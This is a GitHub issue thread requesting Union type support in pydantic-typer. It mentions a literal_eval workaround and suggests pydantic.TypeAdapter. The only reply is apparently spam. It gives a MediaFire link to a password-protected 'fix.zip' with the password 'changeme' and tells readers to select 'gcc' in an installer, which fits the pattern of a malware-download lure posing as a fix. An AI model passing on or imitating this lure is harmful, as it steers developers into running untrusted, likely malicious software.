### ISSUE TITLE
Support for Union types

### ISSUE THREAD

**Issue by pypae** [pypae/pydantic-typer#7]
Currently typer does not support union types. See [this issue](https://github.com/fastapi/typer/issues/461), and this comment in particular: 

> Is there any workaround for this currently? I've got a usecase where I need to be able to accept any of `bool | str | float | int` in a data science CLI application. I'm taking a str and using literal_eval to cast it back to its original type. Is there a better option?

_Originally posted by @echus in https://github.com/fastapi/typer/issues/461#issuecomment-2230415249_

Using `pydantic.TypeAdapter` to parse them can be implemented quite easily.

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
